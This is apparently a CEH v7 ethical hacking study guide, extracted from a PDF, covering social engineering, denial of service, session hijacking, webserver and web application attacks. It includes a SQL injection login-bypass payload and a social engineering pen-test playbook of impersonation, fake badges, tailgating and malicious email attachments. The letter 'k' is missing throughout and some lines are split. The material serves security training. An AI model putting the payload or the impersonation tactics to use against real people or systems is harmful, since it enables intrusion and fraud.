Ris s of Social Networ ing to Corporate Networ s Data Theft A social networ ing site is an enormous database accessed by many individuals, i ncreasing the ris of information exploitation Involuntary Information In the absence of a strong policy, employees may un nowingly post sensitive data about their company on social networ ing Targeted Attac s Information on social networ ing sites could be used for preliminary reconnaissa nce in a targeted attac Networ Vulnerability All social networ ing sites are subject to flaws and bugs that may lead to vulne rabilities in the company s networ Identity Theft Identity theft is a form of fraud in which someone pretends to be someone else b y assuming that person's identity, typically in order to access resources or obtain credit and o ther benefits in that person's name Theft of Personal Information Identity theft occurs when someone steals your name and other personal informati on for fraudulent purposes Loss of Social Security Numbers It is a crime in which an imposter obtains personal information, such as Social Security or driver s license numbers
http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo.jpg http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg Easy Methods Cyberspace has made it easier for an identity thief to use stolen information fo r fraudulent purposes
Social Engineering Countermeasures Policies Good policies and procedures are ineffective if they are not taught and reinforc ed by the employees After receiving training, employees should sign a statement ac nowledging that t hey understand the policies and the ramifications for not upholding them Training An efficient training program should consist of all security policies and variou s methods to increase awareness on social engineering. Being aware of the psychological techniques peo ple tend to succumb to gives users empowerment. They recognize these techniques in use in the future . Operational Guidelines Ensure security of the sensitive information and authorized use of resources Classification of Information Categorize the information as top secret, proprietary, for internal use only, fo r public use, etc. Bac ground Chec s and Proper Termination Procedures Insiders with criminal bac grounds and terminated employees are easy targets for procuring information Access Privileges There should be administrator, user, and guest accounts with proper authorizatio n Proper Incident Response Time There should be proper guidelines for reacting to a social engineering attempt Two-Factor Authentication
Anti-Virus/Anti-Phishing Defenses Use multiple layers of anti-virus defenses at end-user des tops and mail gateway s to minimize social engineering attac s
Change Management Change management is a structured approach to transitioning individuals, teams, and organizations from a current state to a desired future state A documented change-management process is highly effective and is proactive. An employeedependent, undocumented approach is reactive and could harm productivity Social Engineering Pen Testing Gaining Authorization Obtain management s explicit authorization and details that will help in defining the scope of a pen-test. These details may consist of a list of departments, individual employees to targ et, and the level of physical intrusion allowed Intelligence Gathering Collect email addresses, and contact details of the target organization and its human resources (if not already provided) using techniques such as dumpster diving, email guessing, web searches, and email spider tools. Try to extract as much information as possible using footprinting techniques Create a Script Based on the collected information, create believable impersonations, storylines , etc. to attac the target Use Emails If management approves social engineering via email, use phishing techniques, im personation, send malicious attachments. You are assessing how email attac s are treated by the or ganization and how much confidential information can be obtained
http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo.jpg http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg Instead of fixed passwords, use two-factor authentication for high-ris networ services such as VPN s, modem pools, and wireless networ s
http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo.jpg http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg Pic Up the Phone Call a target posing as a colleague, an important customer, tech support, or ref er to an important person in the organization to gain information
In Person Be creative and convincing. Befriend employees, pose as an external auditor, thr ow on some coveralls and impersonate a technician. These are all believable characters to play. Use tailgating to gain physical access, create fa e badges.
Documentation Document EVERYTHING The responses from the users, security staff, and anyone you come into contact w ith. Video ma es for a convincing form of documentation. What information was obtained and what vulnerabilities allowed you to collect co nfidential information There is never a problem with too much detail in a report All of this documentation is important to management as it helps to improve thei r security posture
Once inside eavesdrop and shoulder surf. Meet employees in the brea ri e up a conversation.
room and st
http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo.jpg http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo.jpg http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg
Module 10 Denial of Service Study Guide Objectives:
. . . . . . .
What are DoS and DDoS attac s? Symptoms of a DoS attac DoS Attac Techniques Botnets Detection Techniques Dos/DDoS Attac Countermeasures DoS Attac Penetration Testing
What are DoS and DDoS Attac s? Denial of Service refers to ma ing a web site or service unavailable to users fo r a period of time. A DoS attac becomes a war of attrition. Does the attac er have more bandwidth or CPU power than the victim? Websites are a common target for DOS attac s. If enough users (real or machine created) put a load on a website, then the webserver tas ed with handling the information becomes slowe r or unable to create new connections to provide information. The website code itself may require too much processing power. Depending on the attac , a hac er may be able to use all of the bandwidth available to the webserver. One common method of DOS is a Distributed Denial of Service, where the attac er has multiple computers under their control to distribute the attac . These attac s often occu r using botnets, a set of computers that are controlled li e robots to do a controller s bidding. They can b e directed with simple commands and they are frequently used without the actual owner s nowledge.
An attac er ta es up available resources using specific vulnerabilities or by us ing a Distributed attac through another networ such as a Botnet. Symptoms may include a website being noc ed down, a large influx of spam, or an inability to access the internet. Connection monitor ing features in routers or the use of a separate device will trigger alerts for this type of traffic. These alerts are often configured to allow the conceptual right amount of alerts that the networ admin is comfortab le with, no regard is given to the actual networ traffic when they are set. This creates a false s ense of security. DoS and DDoS wor by flooding a computer or networ with specifically crafted qu eries or by just using a larger amount of bandwidth to connect to the target than the target has availa ble to respond to the
Symptoms of a DoS Attac
requests.
http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo.jpg http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg A Web Stress test, such as used by Massively Multiplayer Online game developers, functions the same way in a legitimate, controlled fashion to show what the brea ing point is of a set of servers. Malicious hac ers can use the same tools and just ignore the brea ing point to bring down the target.
Who uses DoS/DDoS Cyber Criminals are increasingly being associated with organized crime syndicate s. These organizations provide a hierarchical setup to use various activities and technical s ills to m a e sophisticated attac s. Organized groups create and rent botnets, offer services such as malware writing , hac ing ban accounts, or create Denial of Service attac s against targets for a price. Accor ding to Verizon s 2010 Data Breac Investigations Report, the majority of breac es were drivien by orga nized groups and 70% of data stolen was the wor of criminals outside the victim organization. Organi zed hac tivism is a matter of concern for national security agencies.
DoS Attac Techniques
All bandwidth is used up by an attac . This leaves none for legitimate users. Th is type of attac is normally conducted by Distributed Denial of Service. Some hosting companies allo w for ramping up more bandwidth during an attac , but the cost for this service can be prohibitiv e for many companies. Service Request Floods A service request flood wor s by exhausting server resources. Requests are made from a valid source, or a spoofed valid source, with the intention using up TCP connections. When the th reshold for connections is met, the server can no longer answer requests, denying the servic e to other users.
An attac exploits the three way handsha e by creating spoofed SYN pac ets. This
SYN attac
Bandwidth Attac
attac causes the server to send ACK s to the fa e source of the SYN pac ets. This floods the source sys tem that was spoofed with ACK traffic, eeping this system from responding to other traffic.
http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo.jpg http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg SYN Flooding SYN Flooding wor s the same as SYN attac , but instead of sending ACKs to a targ et, it uses the half open connections to overload the listening queue on the server. This eeps the se rver s ability to respond offline for a period of time depending on implementation.
A large number of pac ets with fa e source addresses are sent to target. Whether the target accepts the ping or not the ping traffic overloads the target. This attac is also nown as a Smurf Attac . Peer to Peer attac s Using p2p clients and the DC++ protocol an attac er can instruct other computers on the p2p networ to disconnect and connect to a website. Given the massive amount of users connected to some of these networ s this creates a DoS attac . Permanent Denial of Service This attac is also referred to as Phlashing. An attac er sends a fa e auses a user or system to load software to damage the hardware or bric the system. update that c
Application Level Flood attac s These attac s occur higher on the OSI model than most flood attac s. Using appli cations such as email clients or web logins an attac exploits the program itself to create a flood of traffic. These can also occur with programs using a database by using crafted queries to jam access to t he database. Botnets Botnets are huge networ s that can be commanded to underta e actions on behalf o f the Bot herder . Botnets are created by passing the controlling software to users and networ s by several means. Trojans are a leading cause, such as Shar and Poison Ivy Command and Control, ICQ, IRC Older internet communications such as ICQ and IRC are very lightweight and able to be used to relay commands to a zombie computer in a botnet. Internet Relay Chat is built in
ICMP Flood attac
to some botnet creation tools. When a hac er configures the botnet they can create the callbac that allows for the
http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo.jpg http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg bots to come to a specific IRC chat channel and receive commands from the master control. This allows for a bot herder to issue commands anonymously. DDoS Botnet software operates li e a Trojan. It is covertly installed then it dials b ac to its command center. The compromised computer is now a bot. One new trend with Anonymous is to use th e Low Orbit Ion Cannon, which users can point at a website by themselves or opt in to an attac . Detection Techniques Teaching a computer the difference between legitimate traffic and attac s is con stantly being tested. Once one pattern is found, the human hac er evolves faster than the computer pro gram. The current standard is to use Abnormalities and Noticeable deviation thresholds, which do n ot always wor . Wavelet Analysis is a way of describing input by spectral components loo s for anomalies and the frequency of information to determine the normal frequency versus one during an attac . Sequential Change-Point Detection uses algorithms to isolate traffic statistics that are changed during attac s. Data is initially filtered by address, port, or protocol. This d ata is compared against deviations during an attac .
DoS/DDoS Attac Countermeasures Countermeasure strategies 1. Absorb 2. Degrade 3. Accept To absorb an attac requires the resources and planning to scale your infrastruc ture above the hac ers ability to generate traffic. This requires significant planning and capital. Degrading your services provided by turning off non-critical services. This allo ws your critical services the bandwidth or resources to run. If the non-critical services are being attac ed this may thwart the attac .
A third option is to accept the attac , turning off your outside connections, or allowing them to be down for as long as the attac continues. (Let the terrorists win? Too soon?)
http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo.jpg http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg Mitigation and Prevention Filtering traffic is one method to prevent DoS. Using Ingress and Egress filters to determine if traffic is coming from the correct location, bloc ing the traffic if it does not match. How ever, it can be defeated by spoofing.
Mitigate with Load Balancing and throttling. Disable unused and insecure service s. Bloc all inbound pac ets origination from the service ports. Configure the firewall to deny exter nal Internet Control Message Protocol traffic access. Depending on how external internet access is setup organizations may be able to prevent the transmission of the fraudulently addressed pac ets at ISP level.
DoS Penetration Testing DoS testing involves finding out roughly what the minimum thresholds attac s. Once the target is flooded with traffic, the findings about response time are what is desired. Depending on the target and scope of the engagement, DoS pen testing port flooding, email flooding, or website stress testing. Be cautious and be sure to have rmission to do this type of test. are for DoS compared to may involve explicit pe
Honeypots or Honeynets can be used to deflect attac s to a less critical networ section. Creating a system or networ that loo s li e your production system but does not have the s ensitive data can be difficult and time consuming.
http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo.jpg http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo.jpg http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg Module 11 Session Hijac ing Study Guide Objectives:
. . . . . . . . . . . .
What is Session Hijac ing Key Session Hijac ing Techniques Spoofing vs. Hijac ing Session Hijac ing Process Types of Session Hijac ing Session Hijac ing in OSI Model Application Level Session Hijac ing Networ Level Session Hijac ing TCP/IP Hijac ing Session Hijac ing Tools Countermeasures IPSec Architectrure
http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo.jpg http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg What is Session Hijac ing? Session Hijac ing is exploiting a valid computer session, this occurs when a hac er ta es over a session of communication between two computers. This is used to get access to the system and to steal data. TCP/IP is the most commonly attac ed protocol due to wea nesses in its design an d because it is used in most communication.
Session Hijac ing can be difficult to counter without encryption. Compromised se ssions can allow for information and identity theft in a difficult to trace manner. Most computers us e TCP/IP to communicate, which session hijac ing targets. All of this ma es Session Hijac in g a very big threat. Vulnerabilities that allow session hijac ing include: not having loc outs for s essions, indefinite session times, insecure handing of session ids, and clear text transmission of data incl uding the session identifier. Any of these vulnerabilities can lead to exploitation. Key Session Hijac ing Techniques
Stealing session ids can occur whenever they are transmitted during the session. Sniffing and interception are common methods. A referrer attac is one method. Using a lin t o another site the hac er entices the victim to clic on the lin which causes the browser to send the referrer URL, which contains the session ID. Calculating a session id can be easily accomplished if session ids have no rando m components. Spoofing vs. Hijac ing Spoofing occurs when an attac er pretends to be a valid user. Hijac ing occurs w hen an attac er ta es over a valid user s session. Spoofing requires a hac er to be able to get crendent ials or other identifiers. Hijac ing requires a hac er to be able to find an existing session, usually requ iring sniffing
Brute forcing session ids occurs when there is not a mechanism to stop an attac er from trying random session ids until they are successful. This requires a limited field of possible session ids in order to succeed.
http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo.jpg http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg Session Hijac ing Process 1. 2. 3. 4. 5. Sniff Monitor, in order to predict sequence numbers Session Disconnect of valid user Session ID prediction to ta e over the session Command injection to communicate with target system
Session Hijac ing in OSI Model Networ level Hijac ing involves intercepting pac ets in a TCP or UDP session. T his requires access to networ traffic, which can be accomplished remotely by use of a Trojan or by use of pac et sniffers on a networ or device. Application level hijac ing gains control of an HTTP user session by sniffing th e session ID coo ie or pac et used to eep trac of a user s session on the website. Application Level Session Hijac ing There are multiple methods for gaining control of a session at the application l evel.
Session Sniffing Using a sniffer an attac er can capture a valid session to en and present it to the webserver. If there is not a mechanism for chec ing the validity of the to en, it can be used by the at tac er to gain access to the session. Predicting Session To ens When webservers use a predictable method for generating session ID s it is then po ssible to guess what session ID s will be and use that guess to access the server. One example of this is a webserver session that uses a constant bit of data and adds the date and time to that constant to create a unique session ID.
1. 2. 3. 4.
Session Sniffing Predictable Session To en Man in the middle attac s Client side attac s
http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo.jpg http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg Man-in-the-Middle Attac s A man in the middle attac occurs when the hac er is able to place themselves in to a communication between a client and server. When the client and the server are not able to conf irm each other s identities or if they can be fooled, a man in the middle attac can occur. The a ttac er ta es the communication from the client, and then passes them onto the server. The attac e r can modify or insert data after reading what the pac et contains. This can occur in HTTP trans actions by manipulating the browser or by tric ing a user into using the attac er s machine as a proxy. Client-side Attac s Client-side attac s use methods of getting the session ID stored in a coo ie to compromise a session. If the session ID is stored in a plaintext coo ie it could be used to give the atta c er access to the client session. A Cross-site Scripting attac uses XSS to ma e the client send or show coo ie in formation that can then be used to hijac the session. The same type of information can be gained using malicious javascript of by use of a Trojan. Once the attac er has the Session ID information it is forma tted into a javascript type request to enter the session through a web browser. Session Fixation is a technique where an attac er with a legitimate Session ID i ssued by a server tric s a victim into using that session ID to authenticate. This removes the attac ers ne ed to identify the session used, because they already had that information. There are three common methods used to pass this session information onto the server from the user, by the to en being in the URL argument, hiding it in a hidden form field on the website, or by placing it in a coo ie which is installe d into the browser. Networ Level Session Hijac ing Networ level session hijac ing ta es advantage of how the networ protocol exch anges information to gain a foothold at this lower level, giving an attac er an advantage in compromi sing higher level communication. When the three- way handsha e is used the sequence numbers used by the client an d server are exchanged to give a sense of flow and order to the communication. These sequence numbers are the target of a networ level session hijac attempt.
Sequence number Prediction attac s use this
nowledge of the handsha e to send a
connection attempt to a server with the correct sequence number along with a forged source IP addre ss, which can allow a Denial of service to the true IP or close the connection with a FIN bit.
http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo.jpg http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg TCP/IP Hijac ing TCP/IP hijac ing is a technique using spoofed networ pac ets to ta e over a ses sion between client and target. This requires that you are on the same networ as the target system, and able to spoof the ip address of the client. First, an attac er sniffs traffic to determine the sequen ce numbers in the communication. Then the hac er spoofs the IP and sends a pac et with the next se quence number. The host accepts that pac et, increments the sequence number and sends an ACK to the client. This pac et will be considered out of sequence causing the client to disregard this pac et a s valid, which allows the attac er to step in and continue the communication as if he were the victim. Source Routed pac ets can be used by an attac er to specify what path the pac et s in a communication should ta e. The attac er directs the pac ets to pass through a specific device for sniffing. RST Hijac ing refers to the technique of sending a forged RST pac et to a victim , causing them to end the session. Once this session is closed the victim may attempt to reset the con nection with the hac er or the hac er may create a denial of service by repeating the process. Blind Hijac ing occurs when a hac er can inject data into a communication but is not able to route the communication to sniff the results.
With a pac et sniffer installed on a device, any data that passes through that d evice can be used in a Man in the Middle attac . Using an Address Resolution Protocol Spoof an attac er can pose as another device that a client uses to connect to a host. Using forged Internet Control me ssage Protocol pac ets can also be used to direct client to server traffic through a hac er s pac et snif fer. An example of doing this would be a hac er with a laptop in a coffee shop posing as a Wireless Acces s Point. Clients connect un nowingly to the hac er s Access Point and the hac er sniffs the traffic that then goes to the internet. UDP Hijac ing UDP does not deal with sequence numbers as TCP does, however if the attac er can send a response bac to a client after a request before the server does an attac er can ta e ove r the communication.
Man-in-the-Middle Attac
using Pac et Sniffers
http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo.jpg http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg Session Hijac ing Tools Burp Suite is a proxy that allows for the inspection, modification, and inspecti on of traffic. This is the tool commonly used in our practice. Firesheep is the now defunct firefox addon that allowed anyone who tried it out to hijac sessions of popular sites such as Faceboo and Twitter. Read http://codebutler.github.com fo r more information Countermeasures All session hijac ing relies on plaintext communication. Encryption can be used to eep individual pieces of information such as user names, passwords, and session ids unreadable. Session IDs should be randomly generated on request. This handles the vulnerabil ity of a person being tric ed into using a specific, attac er generated session. Sessions should also have absolute time outs so that they cannot be used after a valid user is disconnected. Networ traffic should not allow source routing of pac ets. Using Encrypted and secure protocols also thwarts session hijac ing.
http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo.jpg http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg IPSec
IPSEC uses two modes; Transport and Tunnel. Transport mode authenticates the com munication between computers. This mode does have the ability to encrypt the actual data pa yload of the pac ets and does wor with Networ Address Translation (NAT). Tunnel mode encapsulates t he whole pac et, not just the data payload. The entire pac et is encrypted then encapsulated. Tun nel mode supports NAT traversal ISPEC uses Authentication Headers to ensure that the data is what it says it is (integrity) and came from where it says it came from (Origin authentication). This also provides a counter measure to replay attac s. The Encapsulation Security Payload is used to eep the information in a pac et c onfidential. IPSEC implementations may include AH, ESP, or both to provide for data security. SA or Security Asssociation is the third component of IPSEC. T he IPSec architec ture uses the concept of a security association as the basis for building security functions into IP. A s ecurity association is simply the bundle of algorithms and parameters (such as eys) that is being used to enc rypt and authenticate a particular flow in one direction. Therefore, in normal bi-directional traffic, t he flows are secured by a pair of security associations.
1. 2. 3. 4. 5.
Networ -level Peer Authentication Data Integrity Data Confidentiality Replay Protection Data Origin Authentication
IPSEC is a set of protocols developed to secure communication at the networ er. It is often used in Virtual Private networ s. IPSEC provides:
lay
Module 12 Hac ing Webservers Study Guide Objectives:
. . . . . . . . .
Webserver Threats Web Application Attac s Webserver Attac Tools Countermeasures Defending Against Webserver Attac s What is Patch Management? Patch Management Tools Webserver Security Tools Webserver Pen Testing
http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo.jpg http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg Webserver Threats Webservers exist to provide information or resources to the public. This creates a partially open door for malicious hac ers, they can then concentrate on forcing it open the rest of the way. Webservers can be vulnerable to attac s that target the website or web application itself, or t o attac s that allow a foothold into a target s environment. Web Application Attac s Directory Traversal Attac s exploit a vulnerability in how the server communicat es with the client to tell it to change the directory for the client. This enables a hac er to view files o utside the web directory and execute commands. This is covered in detail in the next module. HTTP Response Splitting Attac s occur when a malicious hac er inserts data into a request, li e an HTTP request that causes the server to split the response allowing the hac er to cont rol some of the return. The vulnerability is the unvalidated input allowed by the web application on the server. Proper URL encoding and disallowing codes for a carriage return will prevent this attac . HTTP Response Hijac ing occurs when a hac er can use the technique above to send a response to a victim from the vulnerable server and then use the information the victim was tr ansmitting to receive the response of that request. Web Cache Poisoning puts a malicious website into a web server s cache as a legiti mate site. This occurs when a DNS server is vulnerable to accepting cache information from untru sted sources. The attac er issues a command to flush the caches and then sends a request that crea tes the malicious entry. Other webserver attac s target the encryption between the client and server, or the password used to authenticate when these are vulnerable. Webserver Attac Tools Metasploit is a penetration testing tool it. This tool it allows ethical hac ers to test systems, but can be used by malicious hac ers to run exploits against webservers. Metasploit uses n own vulnerabilities to create payloads , files that contain the code needed to successfully exploit these vulnerabilities.
http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo.jpg http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg Countermeasures Countermeasures for webserver attac s can be divided into Updates, Protocols, Ac counts, and file structure. Updates and patches for the server OS of the webserver should be applied in a re gular fashion, after testing in a non-production environment. Protocols used by the webserver should be limited to only the ones required for operation. Insecure protocols such as telnet, smtp, and ftp should not be in use on a webserver. Rem ote access should be encrypted or disabled. All default accounts should be disabled. All accounts that are used by the webse rver should have as little privilege as possible and require strong passwords. These accounts should have logon auditing and have alerts for when they fail to combat dictionary and brute force password att ac s. Directory structure listing should be disabled. Any non-web files such as logs a nd bac ups should be removed from the server. Defending Against Webserver Attac s Defending against web server attac s requires a defense in depth approach to ens ure that all attac vectors have been guarded against. The more ports that are open and applications that are running on a web server creates more opportunities for hac ing. Every service and connectio n should be run with a least privilege account. The server itself needs to be hardened and accessed phy sically only when necessary. It should not be connected to the internet until after it has been ha rdened. If web applications are running that require a database bac end, that database s hould be on a separate server. Audit logs should also be ept on a separate server.
http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo.jpg http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg What is Patch Management? Patch Management is the process of ensuring that all systems are using the appro priate and up to date software for the hardware or software asset. Developing a good patch management system is critical to eeping systems secure. A good patch management program will follow these steps: 1. 2. 3. 4. 5.
Be sure to test updates in a non-production environment. It is important to ensu re that you have a window of time for updating critical systems that will not be too soon after the patch is released. Patches might brea critical software. Being sure that all patches are applied o n a regular basis to all systems is critical. Patch Management Tools The Microsoft Baseline Security Analyzer is an example of a free patch assessmen t tool that can chec for nown vulnerabilities caused by missing patches. Webserver Security Tools SAINT The System Administrators Integrated Networ Tool is a popular software pac age that can be used to assess and test webserver security. It is capable of fully automated scans and c an be used for specific exploitation. Hac Alert Hac Alert is a cloud based service for monitoring and vulnerability assessment. This Software as a Service (SaaS) can also be tied into Web Application Firewalls.
Accurately Inventory all hardware and software assets Determine acceptable update window based on criticalness. Test all updates adequately prior to placing in production environment Install patches within update window stated in step 2. Document any exceptions to the program.
http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo.jpg http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg Webserver Pen Testing Penetration testing webservers encompasses most of the entire pen testing spectr um. Web servers require Footprinting, scanning, enumeration of user accounts and ports, website vulnerability assessment, OS assessment, and specific attac testing. All of these steps must be carried out and documented to perform a full penetration test. After the vulnerabilities are no wn, exploits may be attempted to assess the extent of the vulnerability and determine what informati on can be compromised.
Description: http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo .jpg Description: http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg
http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo.jpg http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg Module 13 Hac ing Web Applications Study Guide Objectives: . Introduction to Web Applications
. Web Application Components
. Web Application Architecture
. Unvalidated Input
. Parameter/Form Tampering
. Injection Flaws
. Cross-Site Scripting (XSS) Attac s
. Hidden Field Manipulation Attac
. How Web Applications Wor
. Hac ing Methodology
. Web Application Hac ing Tools
. How to Defend Against Web Application Attac s
. Web Application Security tools
. Web Application Firewalls
. Web Application Pen Testing
. Web Services Attac
Description: http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo .jpg Description: http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg Introduction to Web Applications Web applications provide an interface between end users and web servers through a set of web pages that are generated at the server end or contain script code to be executed dynam ically within the client Web browser. Web Application Components Web attac vectors are paths or means to attac and gain access to computer or n etwor resources. For example: Parameter manipulation, XML poisoning, client validation, server miscon figuration, web service routing issues, and cross site scripting (XSS). Unvalidated Input When an e-commerce Web site has been compromised, there is a good chance the att ac er used unvalidated input as an element of the attac . If information submitted via a We b site is not validated before it's processed, an attac er can obtain sensitive information or attac th e site. Web applications use input from HTTP requests (and occasionally files) to determ ine how to respond. Attac ers can tamper with any part of an HTTP request, including the URL, query string, headers, coo ies, form fields, and hidden fields, to try to bypass the site s security mech anisms. Common names for common input tampering attac s include: forced browsing, command insertion, cross-site scripting(XSS), buffer overflows, format string attac s, SQL injection, coo ie p oisoning, and hidden field manipulation.
Parameters should be validated against a
positive specification that defines:
Data type (string, integer, real, etc ) Allowed character set Minimum and maximum length Whether null is allowed
Whether the parameter is required or not Whether duplicates are allowed Numeric range Specific legal values (enumeration) Specific patterns (regular expressions)
Description: http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo .jpg Description: http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg Parameter/Form Tampering Parameter tampering occurs when the client side of the web application has sensi tive information which is then manipulated by an attac er. When the client sends the parameters of the exchange to the server, then those parameters can be modified by using a proxy. This type of attac also occurs when hidden fields are used by websites for e-co mmerce transactions. The price or quantity field is transmitted using the client, which ma es the fie ld susceptible to being altered by an attac er. This is called Hidden Field Manipulation.
Directory Traversal The goal of this attac is to order an application to access a computer file tha t is not intended to be accessible. This attac exploits a lac of security (the software is acting exac tly as it is supposed to) as opposed to exploiting a bug in the code. Directory traversal is also nown as the ../ (dot dot slash) attac , directory c limbing, and bac trac ing.
Security Misconfigurations Web server and application server configurations play a ey role in the securit y of a web application. These servers are responsible for serving content and invo ing applications that generate content. In addition, many application servers provide a number of services that web applica tions can use, including data storage, directory services, mail, messaging, and more. Failure to manage t he proper configuration of your servers can lead to a wide variety of security problems. Frequently, the web development group is separate from the group operating the s ite. In fact, there is often a wide gap between those who write the application and those responsible f or the operations environment. Web application security concerns often span this gap and require m embers from both sides of the project to properly ensure the security of a site s application.
Description: http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo .jpg Description: http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg There are a wide variety of server configuration problems that can plague the se curity of a site. These include: . Unpatched security flaws in the server software . Server software flaws or misconfigurations that permit directory listing and d irectory traversal attac s . Unnecessary default, bac up, or sample files, including scripts, applications, configuration files, and web pages . Improper file and directory permissions . Unnecessary services enabled, including content management and remote administ ration . Default accounts with their default passwords . Administrative or debugging functions that are enabled or accessible . Overly informative error messages (more details in the error handling section) . . e . . Misconfigured SSL certificates and encryption settings Use of self-signed certificates to achieve authentication and man-in-the-middl protection Use of default certificates Improper authentication with external systems
Some of these problems can be detected with readily available security scanning tools. Once detected, these problems can be easily exploited and result in total compromise of a websi te. Successful attac s can also result in the compromise of bac end systems including databases and cor porate networ s. Having secure software and a secure configuration are both required in order to have a secure site.
Description: http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo .jpg Description: http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg Injection Attac s Injection problems encompass a wide variety of issues - all mitigated in very d ifferent ways. For this reason, the most effective way to discuss these flaws is to note the distinct fe atures which classify them as injection flaws. The most important issue to note is that all injection problems share one thing in common - i.e., they allow for the injection of control plane data into the user-controlled data plan e. This means that the execution of the process may be altered by sending code in through legitimate da ta channels, using no other mechanism. While buffer overflows, and many other flaws, involve the use o f some further issue to gain execution, injection problems need only for the data to be parsed. The most classing instances of this category of flaw are SQL injection and forma t string vulnerabilities.
Description: http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo .jpg Description: http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg SQL Injection SQL injection ta es advantage of the syntax of SQL to inject commands that can r ead or modify a database, or compromise the meaning of the original query. For example, consider a web page has two fields to allow users to enter a user n ame and a password. The code behind the page will generate a SQL query to chec the password against the list of user names: SELECT UserList.Username FROM UserList WHERE UserList.Username = 'Username' AND UserList.Password = 'Password' If this query returns any rows, then access is granted. However, if the maliciou s user enters a valid Username and injects some valid code ("password' OR '1'='1") in the Password fie ld, then the resulting query will loo li e this: SELECT UserList.Username FROM UserList WHERE UserList.Username = 'Username' AND UserList.Password = 'password' OR '1'='1' In the example above, "Password" is assumed to be blan or some innocuous string . "'1'='1'" will always be true and many rows will be returned, thereby allowing access. The technique may be refined to allow multiple statements to run, or even to loa d up and run external programs.
Description: http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo .jpg Description: http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg CrossSite Scripting (XSS) Attac s Cross-site scripting (XSS) is a security exploit in which the attac er inserts m alicious coding into a lin that appears to be from a trustworthy source. When someone clic s on the lin , t he embedded programming is submitted as part of the client's Web request and can execute on the user's computer, typically allowing the attac er to steal information. Cross-site request forgery (CSRF/XSRF) is almost the opposite of XSS, in that ra ther than exploiting the user's trust in a site, the attac er (and his malicious page) exploits the site' s trust in the client software, submitting requests that the site believes represent conscious and intentional a ctions of authenticated users. Stored XSS Attac s Stored attac s are those where the injected code is permanently stored on the ta rget servers, such as in a database, in a message forum, visitor log, comment field, etc. The victim then retrieves the malicious script from the server when it requests the stored information. Reflected XSS Attac s Reflected attac s are those where the injected code is reflected off the web ser ver, such as in an error message, search result, or any other response that includes some or all of the i nput sent to the server as part of the request. Reflected attac s are delivered to victims via another rout e, such as in an e-mail message, or on some other web server. When a user is tric ed into clic ing on a malicious lin or submitting a specially crafted form, the injected code travels to the vulnerable web server, which reflects the attac bac to the user s browser. The browser then executes the code because it came from a "trusted" server.
At the simplest level, web services can be seen as a specialized web application that differs mainly at the presentation level. While web applications typically are HTML-based, web service s are XML-based. Interactive users for B2C (business to consumer) transactions normally access we b applications, while web services are employed as building bloc s by other web applications for formi
Web Services Attac
ng B2B (business to business) chains using the so-called SOA model.
Description: http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo .jpg Description: http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg Web services typically present a public functional interface, capable of being c alled in a programmatic fashion, while web applications tend to deal with a richer set of features and a re content-driven in most cases.
Hac ers are rapidly learning how to effectively compromise Web Services technolo gies to carry out their attac s or gain valuable footprinting information. These are the tools our practice uses. . Burp Suite . W3af . OWASP
How to Defend Against Web Application Attac s Ma e sure you are familiar with these concepts.
